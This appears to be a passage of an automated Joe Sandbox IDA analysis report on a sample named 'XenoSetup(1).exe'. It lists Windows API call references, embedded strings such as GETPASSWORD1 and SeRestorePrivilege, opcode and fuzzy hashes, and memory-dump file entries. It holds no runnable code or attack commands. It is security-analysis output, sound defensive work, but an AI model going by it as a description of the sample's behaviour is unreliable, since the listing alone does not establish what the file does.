                                                                                      • Opcode Fuzzy Hash: 2bfa958824575a2e86f86ca32715024d8b76a10ecd45e601ee56e49cd5189383
                                                                                      • Instruction Fuzzy Hash: A8F04433008058BEDF236F50AC08DCA3F26EF50760F218005FA5A5E0A0CB7299A1EA90
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 0100891E
                                                                                        • Part of subcall function 01008DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34), ref: 01008DE2
                                                                                        • Part of subcall function 01008DCC: GetLastError.KERNEL32(01013A34,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34,01013A34), ref: 01008DF4
                                                                                      • _free.LIBCMT ref: 01008930
                                                                                      • _free.LIBCMT ref: 01008943
                                                                                      • _free.LIBCMT ref: 01008954
                                                                                      • _free.LIBCMT ref: 01008965
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 988f029fe6a05f639dc62c3a7cc4728922c2e06c4c76ee99837e2dd848bfc8f2
                                                                                      • Instruction ID: f0d4722eaf2a487c27eb248c92aa5264f1ff4e2b92b23668d3d307929edcd898
                                                                                      • Opcode Fuzzy Hash: 988f029fe6a05f639dc62c3a7cc4728922c2e06c4c76ee99837e2dd848bfc8f2
                                                                                      • Instruction Fuzzy Hash: A4F03AB9E20123AB96677F18FA804493FE1F7287147044707F9D852299C73F4941DB81
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _swprintf
                                                                                      • String ID: %ls$%s: %s
                                                                                      • API String ID: 589789837-2259941744
                                                                                      • Opcode ID: e9bbec8fb1b476513e9ae706cbfd1219e2f63602904b6ffc3f3574056225bfc9
                                                                                      • Instruction ID: 8ab8e941399bb4b9bacb9f1892984611353545bbe342b201c7117df3e3a30e8b
                                                                                      • Opcode Fuzzy Hash: e9bbec8fb1b476513e9ae706cbfd1219e2f63602904b6ffc3f3574056225bfc9
                                                                                      • Instruction Fuzzy Hash: BD51873768830CF6E7212AA48E46F367665BF05F44F244507F39AA84F1D9A7A410FB1A
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe,00000104), ref: 01007FAE
                                                                                      • _free.LIBCMT ref: 01008079
                                                                                      • _free.LIBCMT ref: 01008083
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$FileModuleName
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
                                                                                      • API String ID: 2506810119-2811273676
                                                                                      • Opcode ID: 9db6d29bdecf2d327f9e5a875cdfafd83c36bd34c1d6cd3108d60526ee1bc9e6
                                                                                      • Instruction ID: a8f28c56bbcd71cfd3464f57df5d58b733526e3eb2b82fb25b04850707828baf
                                                                                      • Opcode Fuzzy Hash: 9db6d29bdecf2d327f9e5a875cdfafd83c36bd34c1d6cd3108d60526ee1bc9e6
                                                                                      • Instruction Fuzzy Hash: E931A0B5E00209AFEB63DF99D88099EBBECFF94310F1080ABF58497280D6759A40CB51
                                                                                      APIs
                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 010031FB
                                                                                      • _abort.LIBCMT ref: 01003306
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: EncodePointer_abort
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 948111806-2084237596
                                                                                      • Opcode ID: de1ce95b22a71f237b655da219f8504cc7e408cbcfb2f3a46541af9a6a6af8cf
                                                                                      • Instruction ID: 15cb5f5866c3b80b2bea6c4bf8cc8a90eda06ce803b226f24dd80e30bb6c17be
                                                                                      • Opcode Fuzzy Hash: de1ce95b22a71f237b655da219f8504cc7e408cbcfb2f3a46541af9a6a6af8cf
                                                                                      • Instruction Fuzzy Hash: 13416A71900209AFEF17DF98CC81AEEBBB5BF08304F198099FA446B291D735A950DB50
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FE7406
                                                                                        • Part of subcall function 00FE3BBA: __EH_prolog.LIBCMT ref: 00FE3BBF
                                                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00FE74CD
                                                                                        • Part of subcall function 00FE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FE7AAB
                                                                                        • Part of subcall function 00FE7A9C: GetLastError.KERNEL32 ref: 00FE7AF1
                                                                                        • Part of subcall function 00FE7A9C: CloseHandle.KERNEL32(?), ref: 00FE7B00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                      • API String ID: 3813983858-639343689
                                                                                      • Opcode ID: dc44b74439d9404829cbe20175bcbb6436d8fd924be0834daa11c95e16506efa
                                                                                      • Instruction ID: eacfcf9ed38c58a6057299815e0b7c67ec07b0b3c92a1d750071d13d05441b7d
                                                                                      • Opcode Fuzzy Hash: dc44b74439d9404829cbe20175bcbb6436d8fd924be0834daa11c95e16506efa
                                                                                      • Instruction Fuzzy Hash: BE31F471E00398AADF21EFA5DC45BEE7BB9BF44310F084015F845A7192C77C8A44E761
                                                                                      APIs
                                                                                        • Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
                                                                                        • Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370
                                                                                      • EndDialog.USER32(?,00000001), ref: 00FFAD98
                                                                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00FFADAD
                                                                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FFADC2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText$DialogWindow
                                                                                      • String ID: ASKNEXTVOL
                                                                                      • API String ID: 445417207-3402441367
                                                                                      • Opcode ID: 31dd244bc0fb3eb33e873f0fb3b701ac19a5a73f8301df854130bb97b1743a36
                                                                                      • Instruction ID: 27b2cf7b119c8031409fc121138a6af33c0421db475b9909d5a8f87fa0f39ed0
                                                                                      • Opcode Fuzzy Hash: 31dd244bc0fb3eb33e873f0fb3b701ac19a5a73f8301df854130bb97b1743a36
                                                                                      • Instruction Fuzzy Hash: 4611D3B2644218AFD3218FA9ED85F7E7769EF4A742F000100F384DB4B4C776B845A726
                                                                                      APIs
                                                                                      • __fprintf_l.LIBCMT ref: 00FED954
                                                                                      • _strncpy.LIBCMT ref: 00FED99A
                                                                                        • Part of subcall function 00FF1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01021030,00000200,00FED928,00000000,?,00000050,01021030), ref: 00FF1DC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                      • String ID: $%s$@%s
                                                                                      • API String ID: 562999700-834177443
                                                                                      • Opcode ID: 3fe3f5ff086f3f804decc8fa5f2e511ee01f1415d7db2021a3f03f83876c060e
                                                                                      • Instruction ID: 0e905154f4eb4b0b95c5a1b09fca193b3c75596347556a159706860d1ff3a906
                                                                                      • Opcode Fuzzy Hash: 3fe3f5ff086f3f804decc8fa5f2e511ee01f1415d7db2021a3f03f83876c060e
                                                                                      • Instruction Fuzzy Hash: 7021933284028CEEEB21DEA5CC45FDE7BA8BF05310F040126F9549A5A3E676D658EB51
                                                                                      APIs
                                                                                      • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00FEAC5A,00000008,?,00000000,?,00FED22D,?,00000000), ref: 00FF0E85
                                                                                      • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00FEAC5A,00000008,?,00000000,?,00FED22D,?,00000000), ref: 00FF0E8F
                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00FEAC5A,00000008,?,00000000,?,00FED22D,?,00000000), ref: 00FF0E9F
                                                                                      Strings
                                                                                      • Thread pool initialization failed., xrefs: 00FF0EB7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                      • String ID: Thread pool initialization failed.
                                                                                      • API String ID: 3340455307-2182114853
                                                                                      • Opcode ID: b2dececabce5c45a73f32fd4ea1afab017b9067f27dba11dcdf4fbbaaba019e3
                                                                                      • Instruction ID: b3bc70f55c01bfd65c915dfe098b7e5a0c6aa53260e1e9d106d156cd6be68b13
                                                                                      • Opcode Fuzzy Hash: b2dececabce5c45a73f32fd4ea1afab017b9067f27dba11dcdf4fbbaaba019e3
                                                                                      • Instruction Fuzzy Hash: 0D118FB1A4070C9BC3315F6AD8849A7FBECEF64754F10482EF1DAC6211DAB559409B50
                                                                                      APIs
                                                                                        • Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
                                                                                        • Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370
                                                                                      • EndDialog.USER32(?,00000001), ref: 00FFB2BE
                                                                                      • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00FFB2D6
                                                                                      • SetDlgItemTextW.USER32(?,00000067,?), ref: 00FFB304
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText$DialogWindow
                                                                                      • String ID: GETPASSWORD1
                                                                                      • API String ID: 445417207-3292211884
                                                                                      • Opcode ID: f68b528e0b26bfba16ba5612227a6d5b3fb08d6b4cf388cc10b9d81763c9c6d2
                                                                                      • Instruction ID: c8405d126150ad7846ff8d178d27c2d5237a920ac3956b3824bc3146714b59e4
                                                                                      • Opcode Fuzzy Hash: f68b528e0b26bfba16ba5612227a6d5b3fb08d6b4cf388cc10b9d81763c9c6d2
                                                                                      • Instruction Fuzzy Hash: 5A114833A4011C7BDB229AA4DD49FFF372CFF49750F000020FB45B61A4C7A59904A760
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                      • API String ID: 0-56093855
                                                                                      • Opcode ID: dc3780027f3ae2845a59d5dd57bf1617004b4d0ff8f244d28664164db36bcc82
                                                                                      • Instruction ID: 2f63620502e5b37f86f67c989a3570a363475655383aaa18fce40213d9a37560
                                                                                      • Opcode Fuzzy Hash: dc3780027f3ae2845a59d5dd57bf1617004b4d0ff8f244d28664164db36bcc82
                                                                                      • Instruction Fuzzy Hash: 1001B97AA0425CAFD7315E54FC44A6E3BE9FB55354B10402AFA85C3234C67A9850F7A0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: __alldvrm$_strrchr
                                                                                      • String ID:
                                                                                      • API String ID: 1036877536-0
                                                                                      • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                      • Instruction ID: 83dcc9a34a201d7d72609f716728f99757084c7d711dbb805d920a12fae13af8
                                                                                      • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                                                      • Instruction Fuzzy Hash: 0BA11672D0468A9FFB138F18C891BAEBBE5EF55318F1841ADE5C99B2C2C6398941C750
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00FE7F69,?,?,?), ref: 00FEA3FA
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00FE7F69,?), ref: 00FEA43E
                                                                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00FE7F69,?,?,?,?,?,?,?), ref: 00FEA4BF
                                                                                      • CloseHandle.KERNEL32(?,?,?,00000800,?,00FE7F69,?,?,?,?,?,?,?,?,?,?), ref: 00FEA4C6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Create$CloseHandleTime
                                                                                      • String ID:
                                                                                      • API String ID: 2287278272-0
                                                                                      • Opcode ID: c9e25ed7c3c898ee8afa81a6804b02f97d925b013c3a6b9e8e350735ea65e022
                                                                                      • Instruction ID: 00a2e4a755d6733cfa080d1109bb964a71ffe807acfed35dfeedb85ed2ce71a2
                                                                                      • Opcode Fuzzy Hash: c9e25ed7c3c898ee8afa81a6804b02f97d925b013c3a6b9e8e350735ea65e022
                                                                                      • Instruction Fuzzy Hash: 7841DF316483C19ED731DE25DC45FAEBBE4AF80320F04491DB5E0971D0D6A9AA48EB53
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 176396367-0
                                                                                      • Opcode ID: 6524edf3672cade140076445dd290b1d472dd3cf01e28115eff4934edc2c4a38
                                                                                      • Instruction ID: 8c336064b8472bba3c03f5287935dfba8cd783dbc6923b1a0830a7a5147d9463
                                                                                      • Opcode Fuzzy Hash: 6524edf3672cade140076445dd290b1d472dd3cf01e28115eff4934edc2c4a38
                                                                                      • Instruction Fuzzy Hash: 5541E77190066A5BCB219F698C499EF7BB8FF00310F000119FE45FB245DF34AD548BA4
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,010091E0,?,00000000,?,00000001,?,?,00000001,010091E0,?), ref: 0100C9D5
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0100CA5E
                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01006CBE,?), ref: 0100CA70
                                                                                      • __freea.LIBCMT ref: 0100CA79
                                                                                        • Part of subcall function 01008E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0100CA2C,00000000,?,01006CBE,?,00000008,?,010091E0,?,?,?), ref: 01008E38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                      • String ID:
                                                                                      • API String ID: 2652629310-0
                                                                                      • Opcode ID: 807af844703635925789a1c03e8f58155a3488dd0fddc0153ee67b089d8fe4ed
                                                                                      • Instruction ID: 5593644950d06ba352883f0198c20ea65ddd4bebbfdb31d369a7053a9fe36f09
                                                                                      • Opcode Fuzzy Hash: 807af844703635925789a1c03e8f58155a3488dd0fddc0153ee67b089d8fe4ed
                                                                                      • Instruction Fuzzy Hash: DD318F72A0021AABFB26DF68DC45DEE7BA5EF41214F0442A8FD44D6290E739D994CB90
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00FFA666
                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FFA675
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FFA683
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00FFA691
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDevice$Release
                                                                                      • String ID:
